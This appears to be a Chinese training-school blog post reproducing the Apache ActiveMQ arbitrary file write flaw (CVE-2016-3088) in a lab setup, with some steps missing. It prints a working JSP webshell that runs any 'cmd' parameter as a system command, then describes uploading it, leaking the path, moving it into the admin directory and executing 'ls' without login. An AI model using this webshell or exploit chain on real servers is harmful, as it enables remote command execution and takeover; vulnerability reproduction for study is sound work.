2019-08-07 15:25:27 3613浏览
今天千锋扣丁学堂Linux培训老师给大家分享一篇关于介绍了Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现的详细介绍,下面我们一起来看一下吧。
	
	
3、启动,进入bin目录下,运行./activemqstart
	
	
4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境
	
	
<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>
	
	
2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限
	
	
3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径
	
	
4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录
	
	
5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令
	
	
	
	
                          
	
【关注微信公众号获取更多学习资料】 【扫码进入Python全栈开发免费公开课】